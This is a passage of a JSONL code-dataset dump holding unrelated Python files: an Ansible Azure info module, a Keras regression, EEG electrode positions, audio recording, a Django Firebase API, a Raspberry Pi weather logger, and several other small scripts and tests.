print_function\r\n__metaclass__ = type\r\n\r\n\r\nANSIBLE_METADATA = {'metadata_version': '1.1',\r\n 'status': ['preview'],\r\n 'supported_by': 'community'}\r\n\r\n\r\nDOCUMENTATION = '''\r\n---\r\nmodule: azure_rm_virtualcluster_info\nversion_added: '2.9'\nshort_description: Get VirtualCluster info.\ndescription:\n - Get info of VirtualCluster.\noptions:\n resource_group_name:\n description:\n - >-\n The name of the resource group that contains the resource. You can\n obtain this value from the Azure Resource Manager API or the portal.\n type: str\n virtual_cluster_name:\n description:\n - The name of the virtual cluster.\n type: str\nextends_documentation_fragment:\n - azure\nauthor:\n - GuopengLin (@t-glin)\n\r\n'''\r\n\r\nEXAMPLES = '''\r\n - name: List virtualClusters\r\n azure_rm_virtualcluster_info: \r\n {}\r\n \r\n\r\n - name: List virtual clusters by resource group\r\n azure_rm_virtualcluster_info: \r\n resource_group_name: testrg\r\n \r\n\r\n - name: Get virtual cluster\r\n azure_rm_virtualcluster_info: \r\n resource_group_name: testrg\r\n virtual_cluster_name: vc-subnet1-f769ed71-b3ad-491a-a9d5-26eeceaa6be2\r\n \r\n\r\n'''\r\n\r\nRETURN = '''\r\nvirtual_clusters:\r\n description: >-\r\n A list of dict results where the key is the name of the VirtualCluster and\r\n the values are the facts for that VirtualCluster.\r\n returned: always\r\n type: complex\r\n contains:\r\n value:\r\n description:\r\n - Array of results.\r\n returned: always\r\n type: list\r\n sample: null\r\n contains:\r\n subnet_id:\r\n description:\r\n - Subnet resource ID for the virtual cluster.\r\n returned: always\r\n type: str\r\n sample: null\r\n family:\r\n description:\r\n - >-\r\n If the service has different generations of hardware, for the same\r\n SKU, then that can be captured here.\r\n returned: always\r\n type: str\r\n sample: null\r\n child_resources:\r\n description:\r\n - List of resources in this virtual cluster.\r\n returned: always\r\n type: list\r\n sample: null\r\n next_link:\r\n description:\r\n - Link to retrieve next page of results.\r\n returned: always\r\n type: str\r\n sample: null\r\n location:\r\n description:\r\n - Resource location.\r\n returned: always\r\n type: str\r\n sample: null\r\n tags:\r\n description:\r\n - Resource tags.\r\n returned: always\r\n type: dictionary\r\n sample: null\r\n subnet_id:\r\n description:\r\n - Subnet resource ID for the virtual cluster.\r\n returned: always\r\n type: str\r\n sample: null\r\n family:\r\n description:\r\n - >-\r\n If the service has different generations of hardware, for the same\r\n SKU, then that can be captured here.\r\n returned: always\r\n type: str\r\n sample: null\r\n child_resources:\r\n description:\r\n - List of resources in this virtual cluster.\r\n returned: always\r\n type: list\r\n sample: null\r\n\r\n'''\r\n\r\nimport time\r\nimport json\r\nfrom ansible.module_utils.azure_rm_common import AzureRMModuleBase\r\nfrom copy import deepcopy\r\ntry:\r\n from msrestazure.azure_exceptions import CloudError\r\n from azure.mgmt.sql import SqlManagementClient\r\n from msrestazure.azure_operation import AzureOperationPoller\r\n from msrest.polling import LROPoller\r\nexcept ImportError:\r\n # This is handled in azure_rm_common\r\n pass\r\n\r\n\r\nclass AzureRMVirtualClusterInfo(AzureRMModuleBase):\r\n def __init__(self):\r\n self.module_arg_spec = dict(\r\n resource_group_name=dict(\r\n type='str'\r\n ),\r\n virtual_cluster_name=dict(\r\n type='str'\r\n )\r\n )\r\n\r\n self.resource_group_name = None\r\n self.virtual_cluster_name = None\r\n\r\n self.results = dict(changed=False)\r\n self.mgmt_client = None\r\n self.state = None\r\n self.url = None\r\n self.status_code = [200]\r\n\r\n self.query_parameters = {}\r\n self.query_parameters['api-version'] = '2015-05-01-preview'\r\n self.header_parameters = {}\r\n self.header_parameters['Content-Type'] = 'application/json; charset=utf-8'\r\n\r\n self.mgmt_client = None\r\n super(AzureRMVirtualClusterInfo, self).__init__(self.module_arg_spec, supports_tags=True)\r\n\r\n def exec_module(self, **kwargs):\r\n\r\n for key in self.module_arg_spec:\r\n setattr(self, key, kwargs[key])\r\n\r\n self.mgmt_client = self.get_mgmt_svc_client(SqlManagementClient,\r\n base_url=self._cloud_environment.endpoints.resource_manager,\r\n api_version='2015-05-01-preview')\r\n\r\n if (self.resource_group_name is not None and\r\n self.virtual_cluster_name is not None):\r\n self.results['virtual_clusters'] = self.format_item(self.get())\r\n elif (self.resource_group_name is not None):\r\n self.results['virtual_clusters'] = self.format_item(self.listbyresourcegroup())\r\n else:\r\n self.results['virtual_clusters'] = self.format_item(self.list())\r\n return self.results\r\n\r\n def get(self):\r\n response = None\r\n\r\n try:\r\n response = self.mgmt_client.virtual_clusters.get(resource_group_name=self.resource_group_name,\r\n virtual_cluster_name=self.virtual_cluster_name)\r\n except CloudError as e:\r\n self.log('Could not get info for @(Model.ModuleOperationNameUpper).')\r\n\r\n return response\r\n\r\n def listbyresourcegroup(self):\r\n response = None\r\n\r\n try:\r\n response = self.mgmt_client.virtual_clusters.list_by_resource_group(resource_group_name=self.resource_group_name)\r\n except CloudError as e:\r\n self.log('Could not get info for @(Model.ModuleOperationNameUpper).')\r\n\r\n return response\r\n\r\n def list(self):\r\n response = None\r\n\r\n try:\r\n response = self.mgmt_client.virtual_clusters.list()\r\n except CloudError as e:\r\n self.log('Could not get info for @(Model.ModuleOperationNameUpper).')\r\n\r\n return response\r\n\r\n def format_item(self, item):\r\n if hasattr(item, 'as_dict'):\r\n return [item.as_dict()]\r\n else:\r\n result = []\r\n items = list(item)\r\n for tmp in items:\r\n result.append(tmp.as_dict())\r\n return result\r\n\r\n\r\ndef main():\r\n AzureRMVirtualClusterInfo()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"tmp/azure_rm_virtualcluster_info.py","file_name":"azure_rm_virtualcluster_info.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531863291","text":"import pandas as pd\nimport tensorflow as tf # atualizado: tensorflow==2.0.0-beta1\nfrom tensorflow.keras.models import Sequential # atualizado: tensorflow==2.0.0-beta1\nfrom tensorflow.keras.layers import Dense # atualizado: tensorflow==2.0.0-beta1\nfrom sklearn.model_selection import cross_val_score\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom tensorflow.keras import backend as k # atualizado: tensorflow==2.0.0-beta1\nfrom sklearn import metrics\nimport time\n\ninicio = time.time()\nbase = pd.read_csv('autos.csv', encoding = 'ISO-8859-1')\n\nbase = base.drop('dateCrawled', axis = 1)\nbase = base.drop('dateCreated', axis = 1)\nbase = base.drop('nrOfPictures', axis = 1)\nbase = base.drop('postalCode', axis = 1)\nbase = base.drop('lastSeen', axis = 1)\nbase = base.drop('name', axis = 1)\nbase = base.drop('seller', axis = 1)\nbase = base.drop('offerType', axis = 1)\n\nbase = base[base.price > 10]\nbase = base.loc[base.price < 350000]\n\nvalores = {'vehicleType': 'limousine', 'gearbox': 'manuell',\n 'model': 'golf', 'fuelType': 'benzin',\n 'notRepairedDamage': 'nein'}\nbase = base.fillna(value = valores)\n\nprevisores = base.iloc[:, 1:13].values\npreco_real = base.iloc[:, 0].values\n\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\nonehotencoder = ColumnTransformer(transformers=[(\"OneHot\", OneHotEncoder(), [0,1,3,5,8,9,10])],remainder='passthrough')\nprevisores = onehotencoder.fit_transform(previsores).toarray()\n\n\ndef criar_rede(): # atualizado: tensorflow==2.0.0-beta1\n k.clear_session()\n regressor = Sequential([\n tf.keras.layers.Dense(units=158, activation = 'relu', input_dim=316),\n tf.keras.layers.Dense(units=158, activation = 'relu'),\n tf.keras.layers.Dense(units=1, activation = 'linear')])\n regressor.compile(loss = 'mean_absolute_error', optimizer = 'adam',\n metrics = ['mean_absolute_error'])\n return regressor\n\nregressor = KerasRegressor(build_fn = criar_rede,\n epochs = 100,\n batch_size = 300)\nresultados = cross_val_score(estimator = regressor,\n X = previsores, y = preco_real,\n cv = 10, scoring = 'neg_mean_absolute_error')\nfim = time.time()\nmedia = resultados.mean()\ndesvio = resultados.std()\nprint(fim - inicio)\n ","sub_path":"redes_neurais_artificiais/regressao_um_valor/autos_regressao_cruzada.py","file_name":"autos_regressao_cruzada.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637508292","text":"\"\"\"Calculate all standard electrode positions.\n\nSee README for information about assumptions.\n\"\"\"\n# Copyright (c) 2018-2020, Stefan Appelhoff\n# BSD-3-Clause\n\nimport os\n\nimport pandas as pd\n\nfrom eeg_positions.contour_labels import (\n ALL_CONTOURS,\n SYSTEM1005,\n SYSTEM1010,\n SYSTEM1020,\n)\nfrom eeg_positions.utils import (\n find_point_at_fraction,\n get_xyz,\n plot_2d_head,\n plot_spherical_head,\n stereographic_projection,\n)\n\nif __name__ == \"__main__\":\n\n # Known locations\n # ---------------\n Nz = (0.0, 1.0, 0.0)\n Iz = (0.0, -1.0, 0.0)\n Cz = (0.0, 0.0, 1.0)\n T9 = (-1.0, 0.0, 0.0)\n T10 = (1.0, 0.0, 0.0)\n\n d = {\n \"label\": [\"Nz\", \"Iz\", \"Cz\", \"T9\", \"T10\"],\n \"x\": [Nz[0], Iz[0], Cz[0], T9[0], T10[0]],\n \"y\": [Nz[1], Iz[1], Cz[1], T9[1], T10[1]],\n \"z\": [Nz[2], Iz[2], Cz[2], T9[2], T10[2]],\n }\n\n df = pd.DataFrame.from_dict(d)\n\n # Calculate all positions\n # -----------------------\n for contour in ALL_CONTOURS:\n\n if len(contour) == 21:\n midpoint_idx = 10\n elif len(contour) == 17:\n midpoint_idx = 8\n else:\n raise ValueError(\n \"contour must be of len \" \"17 or 21 but is {}\".format(len(contour))\n )\n\n # Get the reference points from data frame\n p1 = get_xyz(df, contour[0])\n p2 = get_xyz(df, contour[midpoint_idx])\n p3 = get_xyz(df, contour[-1])\n\n # Calculate all other points at fractions of distance\n # see `contour_labels.py` and `test_contour_labels.py`\n other_ps = {}\n for i, label in enumerate(contour):\n other_ps[label] = find_point_at_fraction(\n p1, p2, p3, frac=i / (len(contour) - 1)\n )\n\n # Append to data frame\n tmp = pd.DataFrame.from_dict(other_ps, orient=\"index\")\n tmp.columns = [\"x\", \"y\", \"z\"]\n tmp[\"label\"] = tmp.index\n df = df.append(tmp, ignore_index=True, sort=True)\n\n # Remove duplicates, keeping the first computations\n df = df.drop_duplicates(subset=\"label\", keep=\"first\")\n\n # Save The positions as files for the three main standard systems\n # ---------------------------------------------------------------\n fpath = os.path.dirname(os.path.realpath(__file__))\n fname_template = os.path.join(fpath, \"..\", \"data\", \"standard_{}.tsv\")\n\n # First in 3D, then in 2D for each system\n for system, fmt in zip(\n [SYSTEM1020, SYSTEM1010, SYSTEM1005], [\"1020\", \"1010\", \"1005\"]\n ):\n\n idx = df.label.isin(system)\n system_df = df.loc[idx, :]\n system_df = system_df.sort_values(by=\"label\")\n system_df.to_csv(\n fname_template.format(fmt),\n sep=\"\\t\",\n na_rep=\"n/a\",\n index=False,\n float_format=\"%.4f\",\n )\n\n # Now in 2D using stereographic projection\n xs, ys = stereographic_projection(\n system_df[\"x\"].to_numpy(),\n system_df[\"y\"].to_numpy(),\n system_df[\"z\"].to_numpy(),\n )\n system_df = system_df.loc[:, [\"label\", \"x\", \"y\"]]\n system_df.loc[:, \"x\"] = xs\n system_df.loc[:, \"y\"] = ys\n system_df.to_csv(\n fname_template.format(fmt + \"_2D\"),\n sep=\"\\t\",\n na_rep=\"n/a\",\n index=False,\n float_format=\"%.4f\",\n )\n\n # Plot for each standard system\n # -----------------------------\n system = input(\"Which system do you want to plot? (1020/1010/1005/None)\\n\")\n if system in [\"1020\", \"1010\", \"1005\"]:\n df = pd.read_csv(fname_template.format(system), sep=\"\\t\")\n\n # 3D\n fig, ax = plot_spherical_head()\n\n for idx, row in df.iterrows():\n ax.scatter3D(row.x, row.y, row.z, c=\"b\")\n ax.text(row.x, row.y, row.z, row[\"label\"], fontsize=5)\n\n ax.set_title(\"standard_{}\".format(system))\n\n # 2D\n fig2, ax2 = plot_2d_head()\n\n xs, ys = stereographic_projection(df[\"x\"], df[\"y\"], df[\"z\"])\n\n ax2.scatter(xs, ys, marker=\".\", color=\"r\")\n\n for lab, x, y in zip(list(df[\"label\"]), xs, ys):\n ax2.annotate(lab, xy=(x, y), fontsize=5)\n\n ax2.set_title(\"standard_{}\".format(system))\n\n # Show and wait until done\n fig.show()\n fig2.show()\n done = input(\"\\nClick Enter when finished viewing.\\n\")\n","sub_path":"eeg_positions/calc_positions.py","file_name":"calc_positions.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262293714","text":"import pyaudio\nimport wave\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nRESPEAKER_RATE = 16000\nRESPEAKER_CHANNELS = 6 # change base on firmwares, 1_channel_firmware.bin as 1 or 6_channels_firmware.bin as 6\nRESPEAKER_WIDTH = 2\n# run getDeviceInfo.py to get index\nRESPEAKER_INDEX = 4 # refer to input device id\nCHUNK = 1024\nRECORD_SECONDS = 1.2\n\nWAVE_OUTPUT_FILENAME = \"output.wav\"\np = pyaudio.PyAudio()\n\nstream = p.open(\n rate=RESPEAKER_RATE,\n format=p.get_format_from_width(RESPEAKER_WIDTH),\n channels=RESPEAKER_CHANNELS,\n input=True,\n input_device_index=RESPEAKER_INDEX,)\n\nprint(\"* recording\")\n\nframes = []\n\nfor i in range(0, int(RESPEAKER_RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n # Do dome thing with the chunk data, run any speech processing on-the-fly\n d = np.fromstring(data, dtype=np.int16)\n np.save(str('o_all'), d)\n ch0 = d[np.arange(0, CHUNK, 6)]\n ch1 = d[np.arange(1, CHUNK, 6)]\n ch2 = d[np.arange(2, CHUNK, 6)]\n ch3 = d[np.arange(3, CHUNK, 6)]\n ch4 = d[np.arange(4, CHUNK, 6)]\n ch5 = d[np.arange(5, CHUNK, 6)]\n\n\nprint(\"* done recording\")\n\nstream.stop_stream()\nstream.close()\np.terminate()\n\nwf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\nwf.setnchannels(RESPEAKER_CHANNELS)\nwf.setsampwidth(p.get_sample_size(p.get_format_from_width(RESPEAKER_WIDTH)))\nwf.setframerate(RESPEAKER_RATE)\nwf.writeframes(b''.join(frames))\nwf.close()\n","sub_path":"record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119448555","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.views.generic import View\nfrom django.http import HttpResponse, JsonResponse\n# from django.shortcuts import render\n\nfrom firebasedb.models import FirebaseDB\nimport logging\nimport google.oauth2.id_token\n\nlogger = logging.getLogger(__name__)\n\nHTTP_REQUEST = google.auth.transport.requests.Request()\n\n\nclass EchoAPI(View):\n\n def get(self, request, *args, **kwargs):\n return HttpResponse('OK')\n\n\nclass DemoMessagesAPI(View):\n\n def get(self, request, *args, **kwargs):\n\n logger.debug('request.META keys: %s' % str(request.META.keys()))\n logger.debug('request.META authorization value %s' % str(request.META.get('HTTP_AUTHORIZATION')))\n id_token = request.META.get('HTTP_AUTHORIZATION').split(' ').pop()\n logger.debug('DemoMessagesAPI get id_token %s' % id_token)\n\n claims = google.oauth2.id_token.verify_firebase_token(\n id_token, HTTP_REQUEST)\n if not claims:\n return HttpResponse('Unauthorized', status=401)\n else:\n logger.debug('claims: %s' % str(claims))\n\n friendly_id = claims.get('name', claims.get('email', 'Unknown'))\n\n firebase_db = FirebaseDB()\n pi_serial_list = firebase_db.get_dev_serial_list()\n demo_notes = []\n if pi_serial_list:\n for pi_serial in pi_serial_list:\n demo_notes.append({\n 'friendly_id': friendly_id,\n 'message': pi_serial,\n 'created': ''\n })\n\n response = JsonResponse(demo_notes,safe=False)\n # response[\"Access-Control-Allow-Origin\"] = \"*\"\n # response[\"Access-Control-Allow-Methods\"] = \"GET, OPTIONS\"\n # response[\"Access-Control-Max-Age\"] = \"1000\"\n # response[\"Access-Control-Allow-Headers\"] = \"X-Requested-With, Content-Type\"\n\n return response","sub_path":"appengine/backend_api/firenotes/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627804578","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport torch\nfrom torch import nn\n\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n\n\n# object\nclass TransPostProcessor(nn.Module):\n \"\"\"\n From the results of the CNN, post process the masks\n by taking the mask corresponding to the class with max\n probability (which are of fixed size and directly output\n by the CNN) and return the masks in the mask field of the BoxList.\n\n If a masker object is passed, it will additionally\n project the masks in the image according to the locations in boxes,\n \"\"\"\n\n def __init__(self, cfg):\n super(TransPostProcessor, self).__init__()\n self.cfg = cfg.clone()\n\n def forward(self, trans_pred, boxes):\n \"\"\"\n Arguments:\n x (Tensor): the mask logits\n boxes (list[BoxList]): bounding boxes that are used as\n reference, one for ech image\n\n Returns:\n results (list[BoxList]): one BoxList for each image, containing\n the extra field mask\n \"\"\"\n boxes_per_image = [len(box) for box in boxes]\n trans_pred = trans_pred.split(boxes_per_image, dim=0)\n\n results = []\n for trans, box in zip(trans_pred, boxes):\n bbox = BoxList(box.bbox, box.size, mode=\"xyxy\")\n for field in box.fields():\n bbox.add_field(field, box.get_field(field))\n bbox.add_field(\"trans_pred\", trans)\n results.append(bbox)\n\n return results\n\n\ndef make_roi_trans_post_processor(cfg):\n trans_post_processor = TransPostProcessor(cfg)\n return trans_post_processor\n","sub_path":"maskrcnn_benchmark/modeling/roi_heads/trans_head/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399823620","text":"import pandas as pd\nimport seaborns as sns\nimport matplotlib.pyplot as plt\nimport argparse\n\n\ndef main(demo_file,\n inmates_file):\n demographics = pd.read_csv(demo_file)\n inmates = pd.read_csv(inmates_file)\n \n \ndef dist_plots(inmates_file):\n grid = sns.FacetGrid(inmates.dropna(subset=['RACE']), col='RACE', col_wrap=3, hue = 'RACE', palette=sns.color_palette('deep', 6))\n grid.map(sns.distplot, 'length_incarcerated')\n \ndef pie_charts(demo_file):\n return()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--inmates_file\", help=\"Path to inmates file\")\n parser.add_argument(\"--demo_file\", help=\"Path to demographics file\")\n parser.add_argument(\"--output_directory\", help=\"Path to output demographics\")","sub_path":"generate_visualizations/src/.ipynb_checkpoints/gen_visuals-checkpoint.py","file_name":"gen_visuals-checkpoint.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263166671","text":"from pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport sys, os\nimport joblib\n\nDIR = Path(\"/media/zquantz/0236e42e-4d80-45cf-b1f7-f12ee259facd/StockAlgoData/\")\n\ntickers = os.listdir(DIR/\"PriceData\")\ntickers = [ticker[:-4] for ticker in tickers]\ntickers = sorted(tickers)\n\ncs = 1000\nchunks = [tickers[i - cs : i ] for i in range(cs, len(tickers) + cs, cs)]\n\nts = {}\nc_min = \"1950-01-01\"\nc_max = \"2020-01-01\"\n\ndates = pd.date_range(c_min, c_max).astype(str)\nfor date in dates:\n\tts[date] = np.array([0]*len(tickers))\n\ndef process(chunk):\n\n\tmain = []\n\tidc = [tickers.index(ticker) for ticker in chunk]\n\tfor ticker in chunk:\n\n\t\tdf = pd.read_csv(DIR/\"PriceData\"/(ticker+'.csv'))\n\t\tdf = df.sort_values(\"DATE\").reset_index()\n\t\tdf['MktCap'] = df.ADJ_VOLUME * df.ADJ_CLOSE\n\t\tdf = df[['DATE', 'MktCap']].set_index('DATE')\n\t\tdf.columns = [ticker]\n\t\tmain.append(df)\n\n\tmain = pd.concat(main, sort=True, axis=1).fillna(0)\n\tmain = main.rolling(200, min_periods=1).max()\n\n\tfor date, row in zip(main.index, main.values):\n\t\tts[date][idc] = row\n\nif __name__ == '__main__':\n\n\tfor chunk in chunks:\n\t\tprocess(chunk)\n\n\twith open(DIR/\"approx_market_cap_timeseries.pkl\", 'wb') as file:\n\t\tjoblib.dump(tickers, file)\n","sub_path":"data_scripts/get_approx_marketcap_timeseries.py","file_name":"get_approx_marketcap_timeseries.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43795873","text":"import unittest, sys, os, re\nfrom warnings import warn\n\nroot_dir=os.path.abspath(os.path.join(os.path.dirname(__file__),'..','..','..'))\nsys.path.append(os.path.join(root_dir, 'lib'))\nfrom Pipeline.run_cmd import RunCmd\nfrom Pipeline.Pipeline import Pipeline\nfrom Pipeline.host import Host\nfrom writer_cmd import writer_cmd\n\nhost_conf=os.path.join(root_dir, 'config', 'hosts.conf')\nhost=Host(host_conf, 'clutch')\nworking_dir=os.path.dirname(__file__) or os.path.abspath('.')\n\nclass TestBasic(unittest.TestCase):\n \n def setUp(self):\n pass\n\n def test_simplest(self):\n pipeline=Pipeline('mock', host, working_dir)\n cmd=writer_cmd('writer', pipeline)\n cmd.run()\n\n with open(cmd._get_stdout()) as f:\n contents=f.read()\n expected='this goes to stdout\\n'\n self.assertEqual(contents, expected)\n\n with open(cmd._get_stderr()) as f:\n contents=f.read()\n expected='this goes to stderr\\n'\n self.assertEqual(contents, expected)\n\n os.unlink(cmd._get_stdout())\n os.unlink(cmd._get_stderr())\n\n\n def _test_bowtie2(self):\n pipeline=Pipeline('mock', host, working_dir)\n data_basename='1047-COPD.10K'\n ref_index='hg19'\n bt2=RunBowtie2(pipeline, data_basename, ref_index)\n bt2.run()\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestBasic)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n","sub_path":"t/pipeline/run_cmd/redirection.py","file_name":"redirection.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365393354","text":"\r\nimport turtle\r\n\r\ndef eighthGradeMath():\r\n\r\n faster = int(input(\"How fast? 1-10, 1 is slow, 10 is fast: \"))\r\n\r\n turtle.speed(faster)\r\n\r\n size = float(input(\"What size would you like? (Recommended 45): \"))\r\n\r\n pixel = int(input(\"How detailed would you like it? (Pixel separation; \" +\r\n \"10 is recommended. Smaller numbers give more detail.): \"))\r\n \r\n x = size * 10\r\n b = 0\r\n d = 0\r\n f = 0\r\n h = 0\r\n \r\n\r\n # 1st drawn quadrant (math quadrant I, 0-90)\r\n a = 0\r\n b += x\r\n count = 0\r\n while count <= size:\r\n\r\n turtle.setpos(0, b)\r\n turtle.goto(a, 0)\r\n\r\n a += pixel\r\n b -= pixel\r\n \r\n count += 1\r\n\r\n turtle.setpos(0, 0)\r\n\r\n # 2nd drawn quadrant (math quadrant IV, 270-360)\r\n c = 0\r\n d = -x\r\n count = 0\r\n while count <= size:\r\n\r\n turtle.setpos(0, d)\r\n turtle.goto(c, 0)\r\n\r\n c += pixel\r\n d += pixel \r\n\r\n count += 1\r\n \r\n turtle.setpos(0, 0)\r\n\r\n # 3rd drawn quadrant (math quadrant III, 180-270)\r\n e = 0\r\n f = -x\r\n count = 0\r\n \r\n while count <= size:\r\n\r\n turtle.setpos(0, f)\r\n turtle.goto(e, 0) \r\n\r\n e -= pixel\r\n f += pixel\r\n\r\n count += 1\r\n \r\n turtle.setpos(0, 0)\r\n \r\n # 4th drawn quadrant (math quadrant II, 90-180) \r\n g = 0\r\n h = x\r\n count = 0\r\n while count <= size:\r\n\r\n turtle.setpos(0, h)\r\n turtle.goto(g, 0)\r\n\r\n g -= pixel\r\n h -= pixel\r\n\r\n count += 1\r\n \r\n turtle.setpos(0, 0)\r\n\r\n\r\nagain = 'y'\r\n\r\nwhile again == 'y' or 'Y': \r\n\r\n eighthGradeMath()\r\n\r\n reset = input(\"Clear the screen? Hit y for yes and press Enter: \")\r\n\r\n if reset == 'y' or reset == 'Y':\r\n turtle.reset()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Eighth_Grade_Math turtle_code_v.2.0.py","file_name":"Eighth_Grade_Math turtle_code_v.2.0.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165591592","text":"#!/usr/bin/python3 -u\n# -*- coding: utf-8 -*-\n#############################################################################\n# weather_kidsroom.py #\n# Monitor temperature and humidity in our kid's room. #\n# (c) https://github.com/thomaspfeiffer-git 2015, 2016, 2017 #\n#############################################################################\n\"\"\"Monitor temperature and humidity in our kid's room.\"\"\"\n\n# Start with:\n# nohup sudo ./weather_kidsroom.py > /dev/null &\n\nimport datetime\nimport subprocess\nimport sys\nfrom time import strftime, localtime, sleep, time\n\nsys.path.append('../libs')\nsys.path.append('../libs/sensors')\nfrom CPU import CPU\nfrom DHT22_AM2302 import DHT22_AM2302\nfrom Measurements import Measurements\nfrom SensorQueue2 import SensorQueueClient_write\nfrom SensorValue2 import SensorValue, SensorValue_Data\nfrom Shutdown import Shutdown\n\nDHT22_AM2302_PIN = 35\n\n\n# Misc for rrdtool\nRRDFILE = \"/schild/weather/weather_kidsroom.rrd\"\nDS_TEMP1 = \"kidsroom_temp1\"\nDS_TEMPCPU = \"kidsroom_tempcpu\"\nDS_TEMP2 = \"kidsroom_temp2\"\nDS_HUMI = \"kidsroom_humi\"\n\n\n\n###############################################################################\n# Main ########################################################################\ndef main():\n \"\"\"main part\"\"\"\n sq = SensorQueueClient_write(\"../../configs/weatherqueue.ini\")\n qvalue_temp = SensorValue(\"ID_06\", \"TempKinderzimmer\", SensorValue_Data.Types.Temp, \"°C\")\n qvalue_humi = SensorValue(\"ID_07\", \"HumiKinderzimmer\", SensorValue_Data.Types.Humi, \"% rF\")\n sq.register(qvalue_temp)\n sq.register(qvalue_humi)\n\n temphumi = DHT22_AM2302(19, qvalue_temp, qvalue_humi) # BCM 19 = PIN 35\n temp_cpu = CPU()\n\n measurements = {DS_TEMP1: Measurements(3), \\\n DS_TEMPCPU: Measurements(3), \\\n DS_TEMP2: Measurements(3), \\\n DS_HUMI: Measurements(3)}\n\n rrd_template = DS_TEMP1 + \":\" + \\\n DS_TEMPCPU + \":\" + \\\n DS_TEMP2 + \":\" + \\\n DS_HUMI\n\n\n while (True):\n _temp, _humi = temphumi.read()\n measurements[DS_TEMP1].append(_temp)\n measurements[DS_HUMI].append(_humi)\n measurements[DS_TEMPCPU].append(temp_cpu.read_temperature())\n measurements[DS_TEMP2].append(0) # empty, for later useage\n\n rrd_data = \"N:{:.2f}\".format(measurements[DS_TEMP1].last()) + \\\n \":{:.2f}\".format(measurements[DS_TEMPCPU].last()) + \\\n \":{:.2f}\".format(measurements[DS_TEMP2].last()) + \\\n \":{:.2f}\".format(measurements[DS_HUMI].last())\n # print(strftime(\"%H:%M:%S\", localtime()), rrd_data)\n # rrdtool.update(RRDFILE, \"--template\", rrd_template, rrd_data)\n\n # python rrdtool seems not to work here; the pi needs a proper reinstall.\n # as a workaround, i just call the os for rrd update\n # rrd = \"/usr/bin/rrdtool update {} --template {} {}\".format(RRDFILE, rrd_template, rrd_data)\n rrd = [\"/usr/bin/rrdtool\", \"update\", RRDFILE, \"--template\", rrd_template, rrd_data]\n print(rrd)\n subprocess.call(rrd)\n\n sleep(35)\n\n###############################################################################\n# Exit ########################################################################\ndef shutdown_application ():\n \"\"\"cleanup stuff\"\"\"\n sys.exit(0)\n\n\n\n###############################################################################\n###############################################################################\nif __name__ == '__main__':\n shutdown = Shutdown(shutdown_func=shutdown_application)\n\n main()\n\n### eof ###\n\n","sub_path":"weather/weather_kidsroom.py","file_name":"weather_kidsroom.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646003758","text":"from setuptools import setup,find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='mrlog',\n version='0.0.1',\n author='luohuaizhi',\n author_email='luohuaizhi1484@163.com',\n description='record some operate information to db(mongo) at flask running',\n long_description=long_description,\n url='https://github.com/luohuaizhi/record_log',\n #packages=[\"flask\", \"pymongo\"],\n packages=find_packages(),\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n ]\n)\n","sub_path":"pypi_install_script/mrlog-0.0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"456245121","text":"# encoding=utf-8\n# Author: Yu-Lun Chiang\n# Description: Test NewsCrawler\n\nimport logging\nimport pytest\nfrom collections import namedtuple\nfrom Sanga.media import bcc\nfrom Sanga.struct import NewsStruct\n\nlogger = logging.getLogger(__name__)\n\n\nTEST_DATA = namedtuple(\n typename=\"TEST_DATA\",\n field_names=[\n \"name\",\n \"link\",\n \"expected_output\",\n ],\n)\n\nTEST_DATA_1 = TEST_DATA(\n name=\"中國廣播公司_1\",\n link=\"https://www.bcc.com.tw/newsView.6473942\",\n expected_output=NewsStruct(\n title=\"「這家超商」6/23開賣快篩試劑 雙北2門市限量100盒\",\n content=\"\\r\\n 